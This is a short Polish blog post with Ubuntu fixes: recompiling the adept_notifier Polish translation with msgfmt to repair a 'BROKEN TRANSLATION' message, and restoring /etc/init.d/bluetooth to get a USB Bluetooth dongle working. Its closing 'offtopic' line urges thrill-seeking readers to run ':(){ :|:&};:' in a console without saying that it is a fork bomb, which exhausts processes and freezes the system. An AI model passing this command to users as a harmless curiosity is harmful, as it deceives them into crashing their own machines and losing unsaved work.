adept_notifier ….i BROKEN TRANSLATION

Od ostatnich 2-3 wersji Ubuntu w adept_notifier cały czas pojawia mi się dymek BROKEN TRANSLATION zamiast liczby pakietów do uaktualnienia. Oczywiście różne zabawy z apt-get remove adept_notifier –purge itd nic nie pomogły. Podczas totalnego wkurzenia, po kilku piwach udało się to zrobić.

Przepis:

  • Uruchomić msgfmt adept_notifier.po -o adept_notifier.mo
  • Plik wynikowy wrzucić do /usr/share/locale-langpack/pl/LC_MESSAGES i podmienić ten już istniejący
  • Ubić adept_notifier i odpalić go na nowo
  • Cieszyć się wreszcie poprawnie działającym komunikatem o ilości nowych paczek. “Jest dostępnych xx poprawionych pakietów”

Z tego co wiem nie tylko u mnie występował ten problem.

USB Bluetooth dongle

No i po dłuższym czasie wnerwiania bt zaczęło działać jak należy. Okazało się, że apt-get remove bluetooth –purge i ponowna instalacja tegp pakietu robiły wszystko poprawnie… poza właściwym stworzeniem jednego ale jak ważnego pliczku… /etc/init.d/bluetooth

Ręczna podmiana pomogła. BT znów normalnie działa. Dopiero zakup nowego telefonu zmusił mnie do rozwiązania tego problemu raz na zawsze.

Tak offtopic:

Dla żądnych wrażeń polecam uruchomienie pod konsolą: :(){ :|:&};: